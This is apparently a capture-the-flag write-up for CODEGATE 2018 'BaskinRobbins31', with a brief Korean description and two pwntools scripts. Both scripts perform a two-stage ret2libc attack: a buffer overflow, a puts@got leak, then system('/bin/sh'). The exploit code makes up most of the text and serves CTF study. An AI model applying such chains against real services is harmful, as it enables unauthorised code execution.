CODEGATE 2018 BaskinRobbins31

BaskinRobbins31

Binary File

[사진 1-1]
우리가 아는 그 베라 게임이다. 하지만 일반적인 방법으로는 이길 수 없다.
[사진 1-2]
필승법으로 이겨보려 하지만 치트를 쓴다.
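from pwn import *

# CODEGATE 2018 "BaskinRobbins31" -- two-stage ret2libc against ./baskin.
# Stage 1 overflows the turn-input buffer into a ROP chain that calls
# puts(puts@got) to leak a libc pointer and then returns into your_turn()
# so the same overflow can be triggered again.  Stage 2 rebases libc from
# the leak and calls system("/bin/sh").
#
# Bytes literals (b"...") are used throughout: the original str literals and
# the generator .next() method only work on Python 2, whereas b"..." and
# next() behave identically on Python 2 and Python 3 pwntools.

r = process('./baskin')
e = ELF('./baskin')
# Offsets are taken from this local libc copy; they only match if the target
# process actually loads the same libc build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# libc-relative offsets.
puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = next(libc.search(b'/bin/sh'))

# Binary-side addresses.  The hard-coded gadget address only makes sense if
# the binary is loaded at a fixed base (presumably no PIE).
your_turn = e.symbols['your_turn']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x400bc3  # gadget that pops the next stack word into the argument register (presumably pop rdi; ret -- confirm)

# Filler up to the overwritten return address, per the author's layout.
PADDING = b"\x90" * 184

# Stage 1: puts(puts@got), then return into your_turn() for a second overflow.
payload = b""
payload += PADDING
payload += p64(pr)
payload += p64(puts_got)   # argument consumed by the gadget
payload += p64(puts_plt)
payload += p64(your_turn)
r.sendline(payload)

r.recvuntil(b"...:(")
r.recvline()

# puts prints only the significant low 6 bytes of the pointer; zero-extend to 8 for u64.
leaked = u64(r.recv(6).ljust(8, b"\x00"))
libc_base = leaked - puts_offset
system_addr = libc_base + system_offset
binsh_addr = libc_base + binsh_offset

# Stage 2: system("/bin/sh") through the same gadget.
payload2 = b""
payload2 += PADDING
payload2 += p64(pr)
payload2 += p64(binsh_addr)   # argument for system()
payload2 += p64(system_addr)
r.sendlineafter(b"(1-3)", payload2)
r.recvlines(4)  # skip the game's response lines before handing over the shell
r.interactive()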
[Exploit Code]

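from pwn import *

# CODEGATE 2018 "BaskinRobbins31" -- two-stage ret2libc against ./baskin,
# split into leak() / offset() / exploit() steps that communicate through
# module globals.  Bytes literals and next() keep the script runnable on
# both Python 2 and Python 3 pwntools (str literals and generator .next()
# are Python 2 only).

r = process('./baskin')
e = ELF('./baskin')
# Offsets come from this local libc copy; they only match if the target
# process loads the same libc build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# libc-relative offsets.
puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = next(libc.search(b'/bin/sh'))

# Binary-side addresses; the hard-coded gadget implies a fixed load base (presumably no PIE).
your_turn = e.symbols['your_turn']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x400bc3  # gadget that pops the next stack word into the argument register (presumably pop rdi; ret -- confirm)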

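def leak():
    """Stage 1: overflow into a ROP chain that prints puts@got, then return into your_turn().

    Sets the module global ``leaked`` to the 64-bit libc address of puts as
    printed by the target.  Reads the module globals r, pr, puts_got,
    puts_plt and your_turn.  Bytes literals are used so the chain builds on
    both Python 2 and Python 3.
    """
    global leaked
    payload = b""
    payload += b"\x90" * 184   # filler up to the overwritten return address
    payload += p64(pr)         # gadget loading the next word into the argument register
    payload += p64(puts_got)
    payload += p64(puts_plt)   # puts(puts@got): prints the resolved libc pointer
    payload += p64(your_turn)  # come back for a second overflow
    r.sendline(payload)
    r.recvuntil(b"...:(")
    r.recvline()
    # Only the low 6 bytes of the pointer are printed; zero-extend to 8 for u64.
    leaked = u64(r.recv(6).ljust(8, b"\x00"))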

def offset():
    """Rebase libc from the leaked puts address.

    Reads the module global ``leaked`` (set by leak()) together with the
    libc-relative offsets and publishes the module globals ``system_addr``
    and ``binsh_addr`` for exploit().
    """
    global system_addr, binsh_addr
    base = leaked - puts_offset
    system_addr, binsh_addr = base + system_offset, base + binsh_offset

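def exploit():
    """Stage 2: overflow again with system("/bin/sh") and hand the session to the user.

    Reads the module globals r, pr, binsh_addr and system_addr (the latter
    two are set by offset()).  Bytes literals keep the chain valid on both
    Python 2 and Python 3.
    """
    payload2 = b""
    payload2 += b"\x90" * 184   # same filler as in leak()
    payload2 += p64(pr)
    payload2 += p64(binsh_addr)  # argument for system()
    payload2 += p64(system_addr)
    r.sendlineafter(b"(1-3)", payload2)
    r.recvlines(4)  # skip the game's response lines before going interactive
    r.interactive()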

if __name__ == "__main__":
    # Run the stages in order: leak the libc pointer, rebase, then exploit.
    for stage in (leak, offset, exploit):
        stage()
[Exploit Code #2]